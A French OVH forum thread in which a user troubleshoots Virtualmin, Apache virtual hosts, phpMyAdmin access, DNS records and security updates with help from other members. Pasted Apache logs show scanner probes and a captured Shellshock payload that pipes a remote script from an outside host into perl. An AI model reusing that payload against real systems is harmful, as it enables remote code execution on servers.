OVH Community, votre nouvel espace communautaire.

Aide creation nom de domaine sur virtualmin et probleme apache


arn0
06/11/2014, 10h34
Merci pour le lien du livre.

Pour revenir au MAJ, sur Putty sa me dit :

17 packages can be updated.
13 updates are security updates.

J'ai regardé sur virtualmin et apparement sur Virtualmin il y a bien 17 packages. Mais comment je peux differencier les 13 security updates. Il y a t il une commande pour effectuer uniquement les 13 securuty updates ?

EDIT ; apparement dans Scheduled checking options, on peut selectionner sa "Action when update needed 1 Just notify 2 Install security updates 3 Install any updates" Donc on doit pouvoir lister uniquement les mises à jour de secu avant d'exectuter cela non ?
janus57
05/11/2014, 13h06
Citation Envoyé par arn0
Oui je suis d'accord avec toi Mais quand le serveur est en prod si tu fais une mise à jour qui crash tout tu fais quoi ?

Pour te donner un exemple, j'utilise freeradius V1 pour pouvoir authentifier des utilisateurs sur une page. A ce jour la version stable de freeradisu est V2.2.5.
cette version est totalement différent en terme de configuration etc. Donc faut tout réadapter...

Donc imaginons que je fais des MAJ sans reflechir je peux tout faire planter car les scripts ne seront plus adaptés. Après je sais pas si mon raisonnement est correct ?
Bonjour,

petit cadeau qui est dans le très magnifique livre "Le cahier de l'administrateur Debian" ou "The Debian Administrator's Handbook"
http://debian-handbook.info/browse/f...-upgrades.html

Je sais plus le membre m'avait fait découvrir ce livre sur le forum KS mais merci à lui.

Cordialement, janus57
arn0
05/11/2014, 09h08
Oui je suis d'accord avec toi Mais quand le serveur est en prod si tu fais une mise à jour qui crash tout tu fais quoi ?

Pour te donner un exemple, j'utilise freeradius V1 pour pouvoir authentifier des utilisateurs sur une page. A ce jour la version stable de freeradisu est V2.2.5.
cette version est totalement différent en terme de configuration etc. Donc faut tout réadapter...

Donc imaginons que je fais des MAJ sans reflechir je peux tout faire planter car les scripts ne seront plus adaptés. Après je sais pas si mon raisonnement est correct ?
bbr18
05/11/2014, 08h48
Au lieu de faire une mise à jour globale, tu fais manuellement mais là faudra suivre l'actualité des mises à jour de sécurité, y compris phpmyadmin
je trouve que tu te compliques bien la vie ^^
arn0
05/11/2014, 08h33
Concernant phpmyadmin je me suis debrouillé autrement finalement pour y acceder.

j'ai créé un serveur virtuel dans Webmin => Server Web Apache puis j'ai créé un server virtuel qui pointe vers /usr/share/phpmyadmin et j'ai mis le port 86 par exemple.

Donc je peux acceder a phpmyadmin en faisant MONIP:86

Je reviens sur les mises à jour. Quand j'aurais adapter mes scripts aux nouvelles version de logiciel comme radius. Le but est de pouvoir faire les mises à jour mes uniquement celle de securité et pas des logiciels pour eviter d'avoir un priblème d'adaptation de scritp ou autre.

Est-ce possible dans virtualmin ? Et le fait de faire les mises à jour de secu du noyeau ne peut en aucun cas foutre la pagaille dans les scripts ou autres ?
bbr18
04/11/2014, 15h24
oui et jette un oeil à mes tutos car certains petits réglages sont utiles
arn0
04/11/2014, 15h11
OK je sens que je vais tout reinstaller car c'est un peu fouilli maintenant.

Donc pour resumer :

1-j'installe la distrib via le manager

2-j'installe Virtualmin

3-je configure mes serverus virtuels (nom de domaines etc.)

4-j'installe les autres paquets en ssh fail2ban, monit etc.

5-je migre les pages que j'aurais modifié, ainsi que les bases

c'est bon dans cette ordre pour pas que je m’emmêle à nouveau les pinceaux
bbr18
04/11/2014, 15h05
et bien dans tes scripts tu appelles la même bdd peut importe que ce soit celle du ndd1 ou 2, suffit de ne travailler que sur celle là, tant que t'es sur le même serveur, ça ne posera pas de problème.
(si serveurs différents c'est possible aussi mais avec des manipulations supplémentaires)
arn0
04/11/2014, 15h01
Ok mais le problème c'est que ndd1 et ndd2 doivent communiquer avec la meme base et les memes tables avec les memes identifiants qui sont dans des scripts pour chaque ndd. Le but c'est de monter un serveur radius avec des authentification sur une pages web.

C'est d'ailleurs pour cela que j'avais fait l'install en manuel de phpmyadmin
bbr18
04/11/2014, 14h56
non, tu ne passes par virtualmin que pour phpmyadmin et les scripts proposés dans install scripts
le reste c'est apt-get install fail2ban ou autre paquet
et sur l'accueil de virtualmin tu as des liens qui te signalent s'il y a des paquets à mettre à jour ou tu le fait en ssh avec apt-get update && apt-get upgrade
phpmyadmin marche avec tous les domaines que tu installes, tu te connectes avec le login et pass que tu as attribués à chaque domaine
C'est justement l'avantage de virtualmin, tu peux faire plein de choses sur l'interface graphique mais aussi en ssh sans risque de tout casser comme c'est le cas sur la R2
arn0
04/11/2014, 14h51
Effectivement avec virtualmin sa va tout seul pour phpmyadmin. Et comment on sait si phpmyadmin fonctionne pour l'hote MONIP et pour les 2 nom de domaines ?

Car ce que je comprend pas c'est que l'accès URL se fait dans le rep home/37/public_html/urlaccesphpmyadmin

donc comment home/ndd1/public et home/ndd2/public vont comprendre que la bdd se trouve la ??

Donc j'aurais du passer par Install Script du serveur virtual MON IP pour installer tous les logiciels comme Fail2ban, monit etc; ?
bbr18
04/11/2014, 14h27
non aucune incidence
arn0
04/11/2014, 13h51
Ok il me demande de créer une BD pour l'IP du serveur il va pas avoir d’incidence ?

Car en gros le but c'est que mes 2 noms de domaines communique avec la même base de données.

Va falloir que j'apprenne à manier virtualmin :s
bbr18
04/11/2014, 13h10
il vaut mieux desinstaller l'ancien
arn0
04/11/2014, 12h36
Citation Envoyé par bbr18
Création d'un serveur virtuel avec l'IP du serveur
exemple : 111.222.333.444
afin d'installer phpmyadmin de façon centralisée
Dans Virtualmin > Create Virtual Server :
Nom du domaine : ip du serveur, exemple 111.222.333.444
attribuer un mot de passe puis sauvegarder

Installer PhpMyAdmin en étant positionné sur le virtualserver qu'on vient de créer
Virtualmin > Install Scripts, cocher phpmyadmin puis valider (show install options)
Ensuite cocher : All databases, All langages puis valider (Install now)
mettre autre chose que phpmyadmin comme nom de répertoire, exemple ej5kt
il sera accessible ici :
http://111.222.333.444/ej5kt
avec root et mot de passe root mysql et avec user et pass user pour les domaines
Merci pour ton aide donc j'ai compris pourquoi sa ne fonctionne pas depuis que j'ai installé les ndd via virtualmin. Car je n'ai pas créé de Virtual Server pour uniquement l'IP du serveur ! (j'ai juste créé les ndd qui pointe vers l'IP du serveur) du coup le serveur ne comprend plus comment acceder à phpmyadmin et c'est aussi pour sa que j'ai "forbiden" quand je tape l'ip du serveur.

Par contre les autres appli type monit, fail2ban fonctionne bien.

Quand je vais installer phpmyadmin via virtualmin sa va ecraser l'ancien ou faut que je désinstalle le paquet avant ?
bbr18
04/11/2014, 12h06
Création d'un serveur virtuel avec l'IP du serveur
exemple : 111.222.333.444
afin d'installer phpmyadmin de façon centralisée
Dans Virtualmin > Create Virtual Server :
Nom du domaine : ip du serveur, exemple 111.222.333.444
attribuer un mot de passe puis sauvegarder

Installer PhpMyAdmin en étant positionné sur le virtualserver qu'on vient de créer
Virtualmin > Install Scripts, cocher phpmyadmin puis valider (show install options)
Ensuite cocher : All databases, All langages puis valider (Install now)
mettre autre chose que phpmyadmin comme nom de répertoire, exemple ej5kt
il sera accessible ici :
http://111.222.333.444/ej5kt
avec root et mot de passe root mysql et avec user et pass user pour les domaines
arn0
04/11/2014, 11h48
Pour rien te cacher je ne suis pas habitué à virtualmin. Donc la conf de phpmyadmin je l'ai faite à la main et non le script de virtualmin ! Sur virtualmin j'ai juste configuré mes nom de domaine en ajoutant de serveurs virtuel. Mais depuis que j'ai fait sa a priori l'acces phpmyadmin ne fonctionne plus.

Donc jene vois pas en quoi la conf des ndd peut modifier la conf que j'ai fait manuellement de phpmyadmin ?

D’ailleurs comment fait on pour intaller phpmyadmin via l'interface virtualmin ? Car je peux peut etre proceder à une nouvelle instal de phpmyadmin via Virtualmin
bbr18
04/11/2014, 11h03
ce que je ne comprends pas du tout, tu as installé Debian et virtualmin ?
tu as installé phpmyadmin avec le script présent dans l'interface de virtualmin ? (en indiquant autre chose comme nom de répertoire)
alors pourquoi diable vas-tu tout bidouiller ?
Si tu veux tout faire à la main, tu n'installes qu'une distribution nue, si tu installes un panel c'est pour qu'il te simplifgie la tâche et fasse plein de choses à ta place, comme installer phpmyadmin, roundcube, les domaines, etc.
A modifier tout et n'importe quoi, surtout sans comprendre les modifs, plus rien ne va fonctionner.
arn0
04/11/2014, 10h53
Citation Envoyé par bbr18
pourquoi as-tu fait un lien symbolique ???
En suivant les tutos s'etait dit de faire sa. En gros comme tu le sais par defaut on accede à phpmyadmin en faisant : monIP/phpmyadmin et donc j'ai changer l'alias en par exemple monIP/nouvelle url puis sa marchait pas et donc j'ai fait sa (car il dise que dans la plupart des cas faut faire sa) : sudo ln -s /usr/share/phpmyadmin /var/www/phpmyadmin (et je crois que j'ai rempalcer le www/phpmyadmin par la nouvelle redirection)
bbr18
04/11/2014, 10h28
En gros j'avais configuré phpmyadmin en changeant le lien de l'url et en faisant un lien symbolique vers Var/www
pourquoi as-tu fait un lien symbolique ???
arn0
04/11/2014, 10h16
Bonjour,

Depuis que j'ai créé mes virtual servers sur virtualmin j'ai des problèmes accès à phpmyadmin et quand je tape l'IP il y a toujours "forbiden etc" donc peut etre lié.

En gros j'avais configuré phpmyadmin en changeant le lien de l'url et en faisant un lien symbolique vers Var/www et j'ai mis en place un htaccess.

A priori le lien fonctionne vu que quand je tape monIP/urlpouraccederaphpmyadmin . je rentre les identidiants et la se me dit "vouloez-vous ouvrir l'appliocation application/x-httpd-php et sa me telecharge un code source au lieu de m'ouvrir phpmyadmin alors qu'avanat sa fonctionner

Lorsque je redemarre appache j'ai sa maintenant :

Code:
* Restarting web server apache2                                                                 
[Tue Nov 04 11:08:59 2014] [warn] VirtualHost 37.187.119.XX:80 overlaps with VirtualHost 37.187.119.XX:80, the first has precedence, perhaps you need a NameVirtualHost directive
[Tue Nov 04 11:08:59 2014] [warn] VirtualHost 2001:41D0:A:XX:80 overlaps with VirtualHost 2001:41D0:A:6XX:80, the first has precedence, perhaps you need a NameVirtualHost directive
 ... waiting 
[Tue Nov 04 11:09:00 2014] [warn] VirtualHost 37.187.XX:80 overlaps with VirtualHost 37.187.119.XX:80, the first has precedence, perhaps you need a NameVirtualHost directive
[Tue Nov 04 11:09:00 2014] [warn] VirtualHost 2001:41D0:A:6CXX:80 overlaps with VirtualHost 2001:41D0:A:6XX::1:80, the first has precedence, perhaps you need a NameVirtualHost directive
cassiopee
03/11/2014, 10h45
Citation Envoyé par arn0
- Il m'a alloué un quotas de 1024 par defaut pour chaque virtual serveur. Comment cela se fait ?
Parce que par défaut, il est configuré ainsi

Je peux mettre en illimité sans incident ?
Dans l'absolu oui, tu peux aussi simplement augmenter lé quota. Le seul risque avec de l'illimité est de faire grandir un site web
(et/ou de la messagerie avec de grosse pièces jointes) jusqu'au point de saturer le disque dur et donc de planter tout le serveur.
Ensuite on a droit aux joies du mode Rescue

Tu peux également modifier le quota par défaut, mettre par exemple 5 Go ou encore 10 Go par défaut
=> Aller voir du côté des templates (dans Virtualmin, dans "System settings" / "Account plans" / "Default plan")

Les "templates" dans Virtualmin, c'est ce qui défini les paramétres par défaut pour tout nouveau Virtualhost créé.
Cela ne se limite pas au paramétrage d'Apache mais également la messagerie, les DNS, ftp, etc.

- Il m' également créer plein d'adresse mail alors que je n'utilise pas les mails des domaines créé dans virtualmin donc je peux supprimer et desactiver le service mail ? (par contre le serveur m'envoie des mails pour fail2ban, monit etc. mais comme c'est une adresse mail externe sa ne derange pas si le serveur mail est desactivé ?)
Oui, tu peux le désactiver pour ce nom de domaine là, cf ci-dessus pour modifier le comportement par défaut de la messagerie,
donc ici pour les comptes créés par défaut.

Lors de la création d'un nouveau Virtualhost, tu peux simplement décocher la case "Messagerie" de façon à ce qu'il ne créé rien du tout.
(dans "Enabled features" puis la case à cocher "Accept mail for domain")

- Dans le serveur d'enregistrement bind il m'a créé tout un tas de chose qui m'ont l'air d'etre inutile :

Sachant que je vais me servir que de "hots.xx.fr". et "www.hots.xx.fr" (exemple) je peux donc supprimer tout le reste ?
Je te le déconseille :

1) ça ne mange pas de pain de laisser tel que

2) on ne supprime pas des enregistrements DNS "à la hache", certains enregistrements sont indispensables (IN NS, SOA ,etc.)
d'autres fonctionnent par paires, etc. donc sauf si tu connais bien le système DNS, mon conseil serait de laisser tels que
tes enregistrements DNS.
arn0
03/11/2014, 10h20
Bonjour,

effectivement le message Forbidden You don't have permission to access / on this server voulais tout simplement dire que le nom de domaine ne trouvait pas de fichier index. Merci

par contre pour revenir un virtualmin (j'ai pas l'habitude de l'utiliser" quand j'ai créé les serveurs virtual. Il m'a créé tout un tas de chose que j'aimerais bien suprimer :

- Il m'a alloué un quotas de 1024 par defaut pour chaque virtual serveur. Comment cela se fait ? Je peux mettre en illimité sans incident ?

- Il m' également créer plein d'adresse mail alors que je n'utilise pas les mails des domaines créé dans virtualmin donc je peux supprimer et desactiver le service mail ? (par contre le serveur m'envoie des mails pour fail2ban, monit etc. mais comme c'est une adresse mail externe sa ne derange pas si le serveur mail est desactivé ?)

- Dans le serveur d'enregistrement bind il m'a créé tout un tas de chose qui m'ont l'air d'etre inutile :

Code:
$ttl 38400
@	IN	SOA	ns33xxx.ip-37-187-1xx.eu. root.ns33xx.ip-37-187-xx.eu. (
			1414770278
			10800
			3600
			604800
			38400 )
@	IN	NS	ns33xxx.ip-37-187-1xx.eu.
hots.xx.fr.	IN	A	37.187.119.xx
www.hots.xx.fr.	IN	A	37.187.119.xx
ftp.xx.fr.	IN	A	37.187.119.xx
m.hots.xx.fr.	IN	A	37.187.119.xx
localhost.hots.xx.fr.	IN	A	127.0.0.1
webmail.hots.xx.fr.	IN	A	37.187.119.xx
admin.hots.xx.fr.	IN	A	37.187.119.x
mail.hots.xx.fr.	IN	A	37.187.119.x
hots.xx.fr.	IN	MX	5 mail.hots.xx.fr.
hots.xx.fr.	IN	TXT	"v=spf1 a mx a:hots.xx.fr ip4:37.187.119.xx ip6:2001:41D0:A:6xxx ip6:2001:41D0:A:6xxx ~all"
hots.xx.fr.	IN	AAAA	2001:41D0:A:6xxx
www.hots.xx.fr.	IN	AAAA	2001:41D0:A:6xx
....
Sachant que je vais me servir que de "hots.xx.fr". et "www.hots.xx.fr" (exemple) je peux donc supprimer tout le reste ?
cassiopee
31/10/2014, 23h04
Citation Envoyé par arn0
Bon apparemment j'ai trouvé ce qui pourrait poser problème mais je sais pas troo comment y remedier.

En gros il y a un fichier htaccess à la racine du server est dans ce fichier il y a "dd"

Ce qui explique le :
Code:
/.htaccess: Invalid command 'dd', perhaps misspelled or defined by a module not included in the server configuration
je comprend pas pourquoi ce fichier est la. Quand je le renomme j'ai "Forbidden You don't have permission to access / on this server." etc. sur l'Ip et les noms de domaines donc l'erreur doit venir de la. Et quand je le reactive sa me remet "Internal server error"

Comment je peux faire pour m'en débarrasser car apparemment c'est un fichier qui a été crée le 29 et qui doit servir à rien...

PS : dans les repertoires plublic html des noms de domaine je n'ai pas de htaccess

En le supprimant carrément ? Des idées ?

Merci
Commence par supprimer ce fichier ".htaccess" s'il n'y a que "dd" à l'intérieur.

Tel que, il ne sert à rien, à part provoquer une erreur

Ensuite pour le message "Forbidden You don't have permission to access / on this server.",
ça veut seulement dire :

- soit qu'il n'y a pas de fichier d'index à la racine du site (pas de index.htm, index.html, index.php selon)
- soit qu'il y en a un mais qu'il n'est pas reconnu pour le moment par Apache en tant que fichier index.
bbr18
31/10/2014, 22h02
il n'y a pas de fichier .htaccess à la racine du serveur
tu l'as installé comment ce serveur ?
arn0
31/10/2014, 21h53
Citation Envoyé par bbr18
les fichiers de tes domaines tu les as bien mis dans le répertoire public_html ? et envoyés par le ftp de chacun des domaines (pas avec celui du root) ?
Oui c'est bien dans public html et le fichier qui pose probleme est à la racine du server. Et apparemment ce fichier a été cree le 29 alors que j'ai fait la conf des nom de domaines le 31 aujourd'hui.

Concernant les données jai rien mis pour le moment en ftp. Car je voulais déjà voir si j'avais its work " mais non.
bbr18
31/10/2014, 21h04
les fichiers de tes domaines tu les as bien mis dans le répertoire public_html ? et envoyés par le ftp de chacun des domaines (pas avec celui du root) ?
arn0
31/10/2014, 20h08
Bon apparemment j'ai trouvé ce qui pourrait poser problème mais je sais pas troo comment y remedier.

En gros il y a un fichier htaccess à la racine du server est dans ce fichier il y a "dd"

Ce qui explique le :
Code:
/.htaccess: Invalid command 'dd', perhaps misspelled or defined by a module not included in the server configuration
je comprend pas pourquoi ce fichier est la. Quand je le renomme j'ai "Forbidden You don't have permission to access / on this server." etc. sur l'Ip et les noms de domaines donc l'erreur doit venir de la. Et quand je le reactive sa me remet "Internal server error"

Comment je peux faire pour m'en débarrasser car apparemment c'est un fichier qui a été crée le 29 et qui doit servir à rien...

PS : dans les repertoires plublic html des noms de domaine je n'ai pas de htaccess

En le supprimant carrément ? Des idées ?

Merci
arn0
31/10/2014, 19h44
Dans le fichier vhosts_access j'ai des trucs étranges du style :

Code:
XX.eu:80 217.24.78.4 - - [29/Oct/2014:14:33:23 +0100] "\x16\x03\x01" 500 538 "-" "-"
XXeu:80 85.214.110.167 - - [30/Oct/2014:17:15:26 +0100] "GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1" 400 415 "-" "-"
XX.eu:80 81.89.0.201 - - [30/Oct/2014:22:04:01 +0100] "\x80F\x01\x03\x01" 500 538 "-" "-"
XX.eu:80 54.162.83.6 - - [31/Oct/2014:03:01:09 +0100] "\x16\x03\x01" 500 538 "-" "-"
XX.eu:80 141.212.121.10 - - [31/Oct/2014:10:26:28 +0100] "\x16\x03\x01" 500 538 "-" "-"
XX.eu:80 74.82.47.3 - - [31/Oct/2014:14:34:05 +0100] "\x16\x03\x01" 500 538 "-" "-"
XX.eu:80 ::1 - - [31/Oct/2014:15:48:42 +0100] "OPTIONS * HTTP/1.0" 200 110 "-" "Apache (internal dummy connection)"
XX.eu:80 ::1 - - [31/Oct/2014:15:48:43 +0100] "OPTIONS * HTTP/1.0" 200 110 "-" "Apache (internal dummy connection)"
XX.eu:80 ::1 - - [31/Oct/2014:15:48:46 +0100] "OPTIONS * HTTP/1.0" 200 110 "-" "Apache (internal dummy connection)"
XX.eu:80 ::1 - - [31/Oct/2014:16:33:21 +0100] "OPTIONS * HTTP/1.0" 200 110 "-" "Apache (internal dummy connection)"
XX.eu:80 ::1 - - [31/Oct/2014:16:33:21 +0100] "OPTIONS * HTTP/1.0" 200 110 "-" "Apache (internal dummy connection)"
C'est des attaques sa ? C'est lié à mes problèmes ?

Logs access.log :

Code:
94.23.176.59 - - [31/Oct/2014:15:48:39 +0100] "GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1" 404 415 "-" "ZmEu"
94.23.176.59 - - [31/Oct/2014:15:48:39 +0100] "GET /myadmin/scripts/setup.php HTTP/1.1" 404 403 "-" "ZmEu"
94.23.176.59 - - [31/Oct/2014:15:48:39 +0100] "GET /php/phpMyAdmin/scripts/setup.php HTTP/1.1" 404 408 "-" "ZmEu"
94.23.176.59 - - [31/Oct/2014:15:48:39 +0100] "GET /PHPMYADMIN/scripts/setup.php HTTP/1.1" 404 405 "-" "ZmEu"
94.23.176.59 - - [31/Oct/2014:15:48:39 +0100] "GET /PMA/scripts/setup.php HTTP/1.1" 404 400 "-" "ZmEu"
94.23.176.59 - - [31/Oct/2014:15:48:39 +0100] "GET /PMA2005/scripts/setup.php HTTP/1.1" 404 404 "-" "ZmEu"
94.23.176.59 - - [31/Oct/2014:15:48:39 +0100] "GET /bbs/data/scripts/setup.php HTTP/1.1" 404 403 "-" "ZmEu"
94.23.176.59 - - [31/Oct/2014:15:48:39 +0100] "GET /cpadmin/scripts/setup.php HTTP/1.1" 404 402 "-" "ZmEu"
94.23.176.59 - - [31/Oct/2014:15:48:39 +0100] "GET /mysqlmanager/scripts/setup.php HTTP/1.1" 404 406 "-" "ZmEu"
94.23.176.59 - - [31/Oct/2014:15:48:39 +0100] "GET /mysqladminconfig/scripts/setup.php HTTP/1.1" 404 409 "-" "ZmEu"
94.23.176.59 - - [31/Oct/2014:15:48:40 +0100] "GET /phpTest/zologize/axa.php HTTP/1.1" 404 402 "-" "ZmEu"
94.23.176.59 - - [31/Oct/2014:15:48:43 +0100] "GET /pma/scripts/setup.php HTTP/1.1" 404 399 "-" "ZmEu"
94.23.176.59 - - [31/Oct/2014:15:48:43 +0100] "GET /phpMyAdmin/scripts/setup.inc.php HTTP/1.1" 404 408 "-" "ZmEu"
arn0
31/10/2014, 19h23
OK j'irais fouiller la dedans pour voir le fichier htaccess dans le rep home.

Et je mettrais :
Code:
#Options +FollowSymLinks
Dans error.log dans les logs apache j'ai rien qui indique l'erreur de l'IP "Internal server error"

a part des truc comme cela et des attaques

Code:
[Fri Oct 31 17:15:04 2014] [notice] Digest: done
[Fri Oct 31 17:15:05 2014] [notice] Apache/2.2.22 (Ubuntu) DAV/2 SVN/1.6.17 mod_fcgid/2.3.6 PHP/5.3.10-1ubuntu3.14 with Suhosin-Patch mod_ssl/2.2.22 OpenSSL/1.0.1 configured -- resuming normal operations
[Fri Oct 31 17:15:42 2014] [notice] caught SIGTERM, shutting down
[Fri Oct 31 17:17:14 2014] [notice] suEXEC mechanism enabled (wrapper: /usr/lib/apache2/suexec)
[Fri Oct 31 17:17:14 2014] [notice] Digest: generating secret for digest authentication ...
[Fri Oct 31 17:17:14 2014] [notice] Digest: done
ce que je comprend pas c'est que c'est dès que j'ai mis en place des ndd dans virtualmin. J'ai eu une alerte de Monit comme quoi il y avait un problème dans apache dès que j'ai configuré virtualmin. et en relancant toujours ce foutu message sur l'IP, le reverse et les ndd

Par contre l'acces a phpmyadmin, webmin, monit fonctionne bien
cassiopee
31/10/2014, 19h14
Citation Envoyé par arn0
Pour fail2ban je suis entrain de le configurer. Quel service de Fail2ban je dois activer pour bloquer ce genre d'attaque ?

Et c'est quoi ce fichier htaccess je dois le trouver ou ?
quelque part vers :

Code:
/home/[ton_domaine]/public_html
Par exemple, si tu as un nom de VirtualHost tel que "toto.fr", le répertoire racine
de ton site web sera dans "/home/toto/public_html".

Et pourquoi j'ai "Server internal error" sur l'IP aussi ?
La réponse est probablement dans les logs d'Apache
arn0
31/10/2014, 18h43
Pour fail2ban je suis entrain de le configurer. Quel service de Fail2ban je dois activer pour bloquer ce genre d'attaque ?

Et c'est quoi ce fichier htaccess je dois le trouver ou ? Car je viens pas d'une release2 je suis entrain de refaire un nouveau serveur de test de 0 sans rien importer ou autre.

Et pourquoi j'ai "Server internal error" sur l'IP aussi ?
bbr18
31/10/2014, 18h22
et pour les attaques en question, tu installes Fail2ban qui leur claquera la porte au nez ^^
cassiopee
31/10/2014, 17h29
Pour une fois, le message d'erreur est assez clair :

Code:
/.htaccess: Invalid command 'dd', perhaps misspelled or defined by a module not included in the server configuration
Autrement dit, il y a un problème de syntaxe dans le fichier ".htaccess" à la racine du site web en question.

Pour tous ceux qui viennent à Virtualmin en provenance d'une Release 2, vous aurez souvent
à mettre en commentaire (signe dièse # en début de ligne), la ligne :

Code:
Options +FollowSymLinks
dans un fichier ".htaccess" déjà présent dans la Release 2.

- - - Mise à jour - - -

Citation Envoyé par arn0
Mais je pense pas qu'il y a de rapport concernant les attaques ?
Non, en effet, cela n'a pas de rapport.

D'ailleurs comment peut-on savoir si les attaques sont liés à un serveur d'OVH ou non comme j'ai pu voir dans certains posts ?
On peut utiliser un outil de Geolocalisation sur le web ou encore la base Whois à partir de l'adresse IP incriminée.
arn0
31/10/2014, 17h01
Bonjour,

j'ai créé 2 nom de domaine sous virtualmin et depuis j'ai "Internal Server Error" sur l'IP du serveur et sur mes 2 noms de domaines alors qu'avant j'avais "its work" sur l'IP du serveur....

Savez-vous d'ou sa peut venir ? Dans la creation du Virtual Server j'ai mis l'IP V4 et l'IP V6 sa peut peut etre poser problème ?

Dans les logs apache j'ai sa :

Code:
[Fri Oct 31 17:15:04 2014] [notice] Digest: done
[Fri Oct 31 17:15:05 2014] [notice] Apache/2.2.22 (Ubuntu) DAV/2 SVN/1.6.17 mod_fcgid/2.3.6 PHP/5.3.10-1ubuntu3.14 with Suhosin-Patch mod_ssl/2.2.22 OpenSSL/1.0.1 configured -- resuming normal operations
[Fri Oct 31 17:15:42 2014] [notice] caught SIGTERM, shutting down
[Fri Oct 31 17:17:14 2014] [notice] suEXEC mechanism enabled (wrapper: /usr/lib/apache2/suexec)
[Fri Oct 31 17:17:14 2014] [notice] Digest: generating secret for digest authentication ...
[Fri Oct 31 17:17:14 2014] [notice] Digest: done
Et dans les logs de nom de domaine j'ai plein de :

Code:
[Fri Oct 31 17:21:51 2014] [alert] [client 218.59.238.93] /.htaccess: Invalid command 'dd', perhaps misspelled or defined by a module not included in the server configuration
Par contre je vois que j'arrete pas de me faire attaqué :
Code:
Fri Oct 31 15:48:43 2014] [error] [client 94.23.176.59] File does not exist: /var/www/pma
[Fri Oct 31 15:48:43 2014] [error] [client 94.23.176.59] File does not exist: /var/www/phpMyAdmin
[Fri Oct 31 15:48:49 2014] [error] [client 94.23.176.59] Invalid URI in request GET  HTTP/1.1
[Fri Oct 31 16:32:57 2014] [error] [client 67.198.128.138] File does not exist: /var/www/web-console

[Fri Oct 31 03:58:23 2014] [error] [client 91.109.14.78] File does not exist: /var/www/administrator.cgi, referer: () { :; }; curl http://202.143.160.141/lib21/index.cgi | perl
[Fri Oct 31 03:58:23 2014] [error] [client 91.109.14.78] File does not exist: /var/www/admin.cgi, referer: () { :; }; curl http://202.143.160.141/lib21/index.cgi | perl
[Fri Oct 31 03:58:23 2014] [error] [client 91.109.14.78] File does not exist: /var/www/_mt, referer: () { :; }; curl http://202.143.160.141/lib21/index.cgi | perl
Mais je pense pas qu'il y a de rapport concernant les attaques ?

D'ailleurs comment peut-on savoir si les attaques sont liés à un serveur d'OVH ou non comme j'ai pu voir dans certains posts ?